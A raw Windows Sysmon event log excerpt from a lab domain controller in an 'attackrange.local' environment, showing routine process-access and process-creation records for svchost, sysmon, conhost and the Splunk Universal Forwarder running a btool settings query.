08:41:22.777{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001604Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.777{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001603Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.777{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001602Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.777{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001601Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.777{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001600Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.777{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001599Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.777{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001598Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.777{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001597Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.777{5D479F2C-169F-5F84-0500-000000007F01}648664C:\Windows\system32\csrss.exe{5D479F2C-16B2-5F84-3E00-000000007F01}3872C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001596Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.777{5D479F2C-16B2-5F84-3D00-000000007F01}38603864C:\Windows\system32\cmd.exe{5D479F2C-16B2-5F84-3E00-000000007F01}3872C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001595Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.776{5D479F2C-16B2-5F84-3E00-000000007F01}3872C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{5D479F2C-16B2-5F84-3D00-000000007F01}3860C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool web list settings --no-log 10341000x80000000000000001594Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.762{5D479F2C-16B2-5F84-3A00-000000007F01}37963816C:\Windows\system32\conhost.exe{5D479F2C-16B2-5F84-3D00-000000007F01}3860C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001593Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.762{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001592Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.762{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001591Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.762{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001590Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.762{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001589Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.762{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001588Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.762{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001587Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.762{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001586Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.762{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001585Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.762{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001584Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.762{5D479F2C-169F-5F84-0500-000000007F01}648796C:\Windows\system32\csrss.exe{5D479F2C-16B2-5F84-3D00-000000007F01}3860C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001583Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.762{5D479F2C-16B2-5F84-3C00-000000007F01}38403844C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{5D479F2C-16B2-5F84-3D00-000000007F01}3860C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+6665|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+146d6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+d1d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001582Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.770{5D479F2C-16B2-5F84-3D00-000000007F01}3860C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{5D479F2C-16B2-5F84-3C00-000000007F01}3840C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 10341000x80000000000000001581Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.762{5D479F2C-16B2-5F84-3A00-000000007F01}37963816C:\Windows\system32\conhost.exe{5D479F2C-16B2-5F84-3C00-000000007F01}3840C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001580Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.762{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001579Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.762{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001578Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 